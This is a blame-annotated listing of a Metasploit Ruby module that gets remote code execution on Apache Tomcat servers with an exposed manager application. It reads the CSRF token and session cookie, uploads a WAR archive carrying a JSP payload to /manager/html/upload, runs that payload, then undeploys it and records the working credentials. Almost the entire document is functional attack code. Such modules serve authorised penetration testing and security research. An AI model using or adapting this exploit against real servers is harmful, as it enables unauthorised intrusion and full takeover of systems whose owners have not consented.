2014-01-27 14:04:59 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2014-01-27 14:04:59 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2014-01-27 14:04:59 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
|
|
|
|
|
2014-01-30 23:16:43 +00:00
|
|
|
CSRF_VAR = 'CSRF_NONCE='
|
2014-01-30 22:39:19 +00:00
|
|
|
|
2014-01-27 14:04:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2014-02-03 19:13:57 +00:00
|
|
|
'Name' => 'Apache Tomcat Manager Authenticated Upload Code Execution',
|
2014-01-30 20:03:52 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module can be used to execute a payload on Apache Tomcat servers that
|
2014-01-27 14:04:59 +00:00
|
|
|
have an exposed "manager" application. The payload is uploaded as a WAR archive
|
2014-01-30 20:03:52 +00:00
|
|
|
containing a jsp application using a POST request against the /manager/html/upload
|
|
|
|
component.
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
NOTE: The compatible payload sets vary based on the selected target. For
|
|
|
|
example, you must select the Windows target to use native Windows payloads.
|
|
|
|
},
|
2014-01-30 23:16:43 +00:00
|
|
|
'Author' => 'rangercha',
|
2014-01-30 20:03:52 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2014-01-27 14:04:59 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
# This is based on jduck's tomcat_mgr_deploy.
|
|
|
|
# the tomcat_mgr_deploy o longer works for current versions of tomcat due to
|
2014-01-30 20:03:52 +00:00
|
|
|
# CSRF protection tokens. Also PUT requests against the /manager/html/deploy
|
|
|
|
# aren't allowed anymore.
|
|
|
|
|
2014-01-27 14:04:59 +00:00
|
|
|
# There is no single vulnerability associated with deployment functionality.
|
|
|
|
# Instead, the focus has been on insecure/blank/hardcoded default passwords.
|
|
|
|
|
2014-01-30 20:03:52 +00:00
|
|
|
# The following references refer to HP Operations Manager
|
2014-01-30 23:16:43 +00:00
|
|
|
['CVE', '2009-3843'],
|
|
|
|
['OSVDB', '60317'],
|
|
|
|
['CVE', '2009-4189'],
|
|
|
|
['OSVDB', '60670'],
|
2014-01-30 20:03:52 +00:00
|
|
|
|
|
|
|
# HP Operations Dashboard
|
2014-01-30 23:16:43 +00:00
|
|
|
['CVE', '2009-4188'],
|
2014-01-30 20:03:52 +00:00
|
|
|
|
|
|
|
# IBM Cognos Express Default user/pass
|
2014-01-30 23:16:43 +00:00
|
|
|
['BID', '38084'],
|
|
|
|
['CVE', '2010-0557'],
|
|
|
|
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
|
2014-01-30 20:03:52 +00:00
|
|
|
|
|
|
|
# IBM Rational Quality Manager and Test Lab Manager
|
2014-01-30 23:16:43 +00:00
|
|
|
['CVE', '2010-4094'],
|
|
|
|
['ZDI', '10-214'],
|
2014-01-30 20:03:52 +00:00
|
|
|
|
|
|
|
# 'admin' password is blank in default Windows installer
|
2014-01-30 23:16:43 +00:00
|
|
|
['CVE', '2009-3548'],
|
|
|
|
['OSVDB', '60176'],
|
|
|
|
['BID', '36954'],
|
2014-01-30 20:03:52 +00:00
|
|
|
|
|
|
|
# tomcat docs
|
2014-01-30 23:16:43 +00:00
|
|
|
['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
|
2014-01-27 14:04:59 +00:00
|
|
|
],
|
|
|
|
'Platform' => %w{ java linux win }, # others?
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Java Universal',
|
|
|
|
{
|
2014-01-30 20:03:52 +00:00
|
|
|
'Arch' => ARCH_JAVA,
|
2014-01-27 14:04:59 +00:00
|
|
|
'Platform' => 'java'
|
2014-01-30 23:16:43 +00:00
|
|
|
}
|
2014-01-27 14:04:59 +00:00
|
|
|
],
|
|
|
|
#
|
|
|
|
# Platform specific targets only
|
|
|
|
#
|
|
|
|
[ 'Windows Universal',
|
|
|
|
{
|
2014-01-30 20:03:52 +00:00
|
|
|
'Arch' => ARCH_X86,
|
2014-01-27 14:04:59 +00:00
|
|
|
'Platform' => 'win'
|
2014-01-30 23:16:43 +00:00
|
|
|
}
|
2014-01-27 14:04:59 +00:00
|
|
|
],
|
|
|
|
[ 'Linux x86',
|
|
|
|
{
|
2014-01-30 20:03:52 +00:00
|
|
|
'Arch' => ARCH_X86,
|
2014-01-27 14:04:59 +00:00
|
|
|
'Platform' => 'linux'
|
2014-01-30 23:16:43 +00:00
|
|
|
}
|
|
|
|
]
|
2014-01-27 14:04:59 +00:00
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Nov 09 2009'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2016-05-27 23:37:04 +00:00
|
|
|
OptString.new('HttpUsername', [false, 'The username to authenticate as']),
|
2016-05-27 23:31:54 +00:00
|
|
|
OptString.new('HttpPassword', [false, 'The password for the specified username']),
|
2014-01-27 14:04:59 +00:00
|
|
|
# /cognos_express/manager/ for Cognos Express (19300)
|
2014-01-30 23:16:43 +00:00
|
|
|
OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
res = query_manager
|
|
|
|
disconnect
|
2014-01-30 20:03:52 +00:00
|
|
|
|
2014-01-30 21:17:20 +00:00
|
|
|
return CheckCode::Unknown if res.nil?
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2014-01-30 20:20:02 +00:00
|
|
|
if res.code.between?(400, 499)
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Server rejected the credentials")
|
2014-01-30 20:20:02 +00:00
|
|
|
return CheckCode::Unknown
|
|
|
|
end
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2014-01-30 21:17:20 +00:00
|
|
|
return CheckCode::Safe unless res.code == 200
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2014-01-30 21:17:20 +00:00
|
|
|
# if res.code == 200
|
|
|
|
# there should be access to the Tomcat Manager and to the status page
|
2014-01-30 20:27:20 +00:00
|
|
|
res = query_status
|
2014-01-30 21:17:20 +00:00
|
|
|
return CheckCode::Unknown unless res
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
plat = detect_platform(res.body)
|
|
|
|
arch = detect_arch(res.body)
|
2014-01-30 21:17:20 +00:00
|
|
|
return CheckCode::Unknown unless plat and arch
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_status("Tomcat Manager found running on #{plat} platform and #{arch} architecture")
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2017-05-30 19:43:53 +00:00
|
|
|
store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2014-01-30 21:17:20 +00:00
|
|
|
return CheckCode::Appears
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2014-01-30 23:16:43 +00:00
|
|
|
@app_base = rand_text_alphanumeric(4 + rand(32 - 4))
|
|
|
|
@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
|
2014-01-30 22:23:17 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# Find the session ID and the CSRF token
|
|
|
|
#
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Retrieving session ID and CSRF token...")
|
2014-01-30 22:29:45 +00:00
|
|
|
unless access_manager?
|
|
|
|
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
|
|
|
|
end
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
#
|
2014-01-30 22:23:17 +00:00
|
|
|
# Upload Payload
|
|
|
|
#
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Uploading and deploying #{@app_base}...")
|
2014-01-30 22:58:17 +00:00
|
|
|
if upload_payload
|
2017-05-30 19:43:53 +00:00
|
|
|
store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
|
2014-01-30 22:58:17 +00:00
|
|
|
else
|
|
|
|
fail_with(Failure::Unknown, "Upload failed")
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
2014-01-30 22:23:17 +00:00
|
|
|
# Execute Payload
|
2014-01-27 14:04:59 +00:00
|
|
|
#
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Executing #{@app_base}...")
|
2014-01-30 22:58:17 +00:00
|
|
|
unless execute_payload
|
|
|
|
fail_with(Failure::Unknown, "Failed to execute the payload")
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
#
|
|
|
|
# Get the new CSRF token & session id
|
|
|
|
#
|
2014-01-30 22:29:45 +00:00
|
|
|
unless access_manager?
|
|
|
|
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
|
|
|
|
end
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
#
|
2014-01-30 22:23:17 +00:00
|
|
|
# Delete the deployed payload
|
2014-01-27 14:04:59 +00:00
|
|
|
#
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Undeploying #{@app_base} ...")
|
2014-01-30 22:58:17 +00:00
|
|
|
unless undeploy_app
|
2016-02-01 21:12:03 +00:00
|
|
|
print_warning("Failed to undeploy #{@app_base}...")
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-01-30 20:27:20 +00:00
|
|
|
def query_status
|
|
|
|
path = normalize_uri(target_uri.path.to_s, 'status')
|
|
|
|
res = send_request_raw('uri' => path)
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2014-01-30 20:27:20 +00:00
|
|
|
unless res and res.code == 200
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Failed: Error requesting #{path}")
|
2014-01-27 14:04:59 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
2014-01-30 20:20:02 +00:00
|
|
|
def query_manager
|
2014-01-30 20:03:52 +00:00
|
|
|
path = normalize_uri(target_uri.path.to_s, '/html')
|
2014-01-30 20:20:02 +00:00
|
|
|
res = send_request_raw('uri' => path)
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
def vars_get
|
|
|
|
vars = {}
|
|
|
|
unless @csrf_token.nil?
|
|
|
|
vars = {
|
|
|
|
"path" => @app_base,
|
|
|
|
"org.apache.catalina.filters.CSRF_NONCE" => @csrf_token
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
return vars
|
|
|
|
end
|
|
|
|
|
2014-01-30 20:27:20 +00:00
|
|
|
def detect_platform(body)
|
|
|
|
return nil if body.blank?
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
i=0
|
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
body.each_line do |ln|
|
2014-01-27 14:04:59 +00:00
|
|
|
ln.chomp!
|
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
i = 1 if ln =~ /OS Name/
|
2014-01-27 14:04:59 +00:00
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
if i == 9 or i == 11
|
2014-01-27 14:04:59 +00:00
|
|
|
if ln.include? "Windows"
|
|
|
|
return 'win'
|
|
|
|
elsif ln.include? "Linux"
|
|
|
|
return 'linux'
|
|
|
|
elsif i==11
|
|
|
|
return 'unknown'
|
|
|
|
end
|
|
|
|
end
|
2014-01-30 22:23:17 +00:00
|
|
|
|
|
|
|
i = i+1 if i > 0
|
|
|
|
end
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def detect_arch(body)
|
2014-01-30 20:27:20 +00:00
|
|
|
return nil if body.blank?
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
i=0
|
2014-01-30 22:23:17 +00:00
|
|
|
body.each_line do |ln|
|
2014-01-27 14:04:59 +00:00
|
|
|
ln.chomp!
|
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
i = 1 if ln =~ /OS Architecture/
|
|
|
|
|
|
|
|
if i==9 or i==11
|
2016-10-27 21:16:05 +00:00
|
|
|
# check against x86_64 before x86 to make sure we don't match
|
|
|
|
# incorrectly on x86 first
|
|
|
|
if ln.include?('x86_64')
|
|
|
|
return ARCH_X64
|
|
|
|
elsif ln.include?('amd64')
|
|
|
|
return ARCH_X64
|
|
|
|
elsif ln.include?('x86')
|
2014-01-27 14:04:59 +00:00
|
|
|
return ARCH_X86
|
2016-10-27 21:16:05 +00:00
|
|
|
elsif ln.include?('i386')
|
2014-01-27 14:04:59 +00:00
|
|
|
return ARCH_X86
|
2016-10-27 21:16:05 +00:00
|
|
|
elsif ln.include?('i686')
|
2014-01-27 14:04:59 +00:00
|
|
|
return ARCH_X86
|
|
|
|
elsif i==11
|
|
|
|
return 'unknown'
|
|
|
|
end
|
|
|
|
end
|
2014-01-30 22:23:17 +00:00
|
|
|
|
|
|
|
i = i + 1 if i > 0
|
|
|
|
end
|
2014-01-27 14:04:59 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def find_csrf(res = nil)
|
2014-01-30 22:39:19 +00:00
|
|
|
return "" if res.blank?
|
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_status("Finding CSRF token...")
|
2014-01-30 22:39:19 +00:00
|
|
|
|
|
|
|
body = res.body
|
|
|
|
|
|
|
|
body.each_line do |ln|
|
2014-01-27 14:04:59 +00:00
|
|
|
ln.chomp!
|
2014-01-30 22:39:19 +00:00
|
|
|
csrf_nonce = ln.index(CSRF_VAR)
|
|
|
|
next if csrf_nonce.nil?
|
|
|
|
token = ln[csrf_nonce + CSRF_VAR.length, 32]
|
|
|
|
return token
|
|
|
|
end
|
2014-01-27 14:04:59 +00:00
|
|
|
|
|
|
|
return ""
|
|
|
|
end
|
|
|
|
|
2014-01-30 22:23:17 +00:00
|
|
|
def generate_multipart_msg(boundary, data)
|
|
|
|
# Rex::MIME::Message is breaking the binary upload when trying to
|
|
|
|
# enforce CRLF for SMTP compatibility
|
|
|
|
war_multipart = "-----------------------------"
|
|
|
|
war_multipart << boundary
|
|
|
|
war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
|
|
|
|
war_multipart << @app_base
|
|
|
|
war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
|
|
|
|
war_multipart << data
|
|
|
|
war_multipart << "\r\n-----------------------------"
|
|
|
|
war_multipart << boundary
|
|
|
|
war_multipart << "--\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
def war_payload
|
|
|
|
payload.encoded_war({
|
|
|
|
:app_name => @app_base,
|
|
|
|
:jsp_name => @jsp_name,
|
|
|
|
:arch => target.arch,
|
|
|
|
:platform => target.platform
|
|
|
|
}).to_s
|
|
|
|
end
|
|
|
|
|
|
|
|
def send_war_payload(url, war)
|
|
|
|
boundary_identifier = rand_text_numeric(28)
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => url,
|
|
|
|
'method' => 'POST',
|
|
|
|
'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
|
2016-05-27 23:37:04 +00:00
|
|
|
'user' => datastore['HttpUsername'],
|
2016-05-27 23:31:54 +00:00
|
|
|
'password' => datastore['HttpPassword'],
|
2014-01-30 22:23:17 +00:00
|
|
|
'cookie' => @session_id,
|
|
|
|
'vars_get' => vars_get,
|
|
|
|
'data' => generate_multipart_msg(boundary_identifier, war),
|
|
|
|
})
|
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
|
|
|
def send_request_undeploy(url)
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => url,
|
|
|
|
'vars_get' => vars_get,
|
|
|
|
'method' => 'POST',
|
2016-05-27 23:37:04 +00:00
|
|
|
'user' => datastore['HttpUsername'],
|
2016-05-27 23:31:54 +00:00
|
|
|
'password' => datastore['HttpPassword'],
|
2014-01-30 22:23:17 +00:00
|
|
|
'cookie' => @session_id
|
|
|
|
})
|
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
2014-01-30 22:29:45 +00:00
|
|
|
def access_manager?
|
|
|
|
res = query_manager
|
|
|
|
return false unless res and res.code == 200
|
|
|
|
@session_id = res.get_cookies
|
|
|
|
@csrf_token = find_csrf(res)
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
2014-01-30 22:58:17 +00:00
|
|
|
def upload_payload
|
|
|
|
war = war_payload
|
|
|
|
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_status("Uploading #{war.length} bytes as #{@app_base}.war ...")
|
2014-01-30 22:58:17 +00:00
|
|
|
res = send_war_payload(upload_path, war)
|
|
|
|
|
|
|
|
unless res
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Upload failed on #{upload_path} [No Response]")
|
2014-01-30 22:58:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
if res.code < 200 or res.code >= 300
|
|
|
|
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
2014-01-30 22:58:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
|
|
|
def execute_payload
|
|
|
|
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
|
|
|
|
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_status("Executing #{jsp_path}...")
|
2014-01-30 22:58:17 +00:00
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => jsp_path,
|
|
|
|
'method' => 'GET'
|
|
|
|
})
|
|
|
|
|
|
|
|
return parse_execute_response(res)
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_execute_response(res)
|
|
|
|
unless res
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Execution failed on #{@app_base} [No Response]")
|
2014-01-30 22:58:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
if res and (res.code < 200 or res.code >= 300)
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]")
|
2014-01-30 22:58:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
|
|
|
def undeploy_app
|
|
|
|
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
|
|
|
|
res = send_request_undeploy(undeploy_url)
|
|
|
|
|
|
|
|
unless res
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]")
|
2014-01-30 22:58:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
if res and (res.code < 200 or res.code >= 300)
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_warning("Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
|
2014-01-30 22:58:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
return true
|
|
|
|
end
|
|
|
|
|
2017-05-30 19:43:53 +00:00
|
|
|
def service_details
|
|
|
|
super.merge({ access_level: 'Admin' })
|
2014-06-04 21:07:57 +00:00
|
|
|
end
|
2014-02-03 19:13:57 +00:00
|
|
|
end
|